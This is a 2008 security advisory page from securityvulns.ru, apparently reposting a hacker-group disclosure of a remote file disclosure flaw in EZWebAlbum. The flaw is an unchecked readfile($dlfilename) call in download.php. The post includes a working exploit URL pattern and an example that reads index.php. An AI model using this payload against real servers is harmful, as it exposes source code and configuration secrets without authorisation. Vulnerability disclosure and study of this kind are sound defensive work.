Computer Security

Security Advisory: EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  E-Mail header Injection in HiFriend

  Vulnerability: SocialEngine (SocialEngine.
net) high risk security flaw

  [DSECRG-08-031] Local File Include Vulnerability in Interact 2.4.1

  MyBlog <=0.9.8 Multiple Vulnerabilities

From:Ghost hacker <ghost-r00t_(at)_hotmail.com>
Date:22.07.2008
Subject:EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability



#################################################################################
#################
EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability     |,  .-.  .-.  ,|
Found by : Ghost Hacker [ R-H TeaM ]                             | )(_o/  \o_)( |
My Site web : Real-hack.Net                                      |/     /\     \|
#################################################################################
#################
[~] Found by : Ghost Hacker [ R-H TeaM ]
[~] Home page : www.Real-hack.net
[~] Email : Ghost-r00t@Hotmail.com
[~] Name Script : EZWebAlbum
[~] Download Script : http://sourceforge.net/projects/ezwebalbum
###################################### [ Viva IslaM & KSA ] ######################################
[~] Error (download.php) :
readfile($dlfilename);

[~] Exploit :
http://xxxx/[path]/download.php?dlfilename=EVIL
[~] Example :
http://xxxx/[path]/download.php?dlfilename=index.php
###################################### [ Viva IslaM & KSA ] ######################################
[~] Greetz :
PROTO & QaTaR BoeZ TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & LeGeNd HaCkEr & Root Hacker ..
Qptan & ScarY.HaCkEr & EgYpTiaNxHaCkEr the-pirate.org & Mr.hope & My Blog[ gh0st10.wordpress.com ]
All Members Real Hack And All My Friends ..
#################################################################################
#################
Found by : Ghost Hacker [ R-H TeaM ]
#################################################################################
#################
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru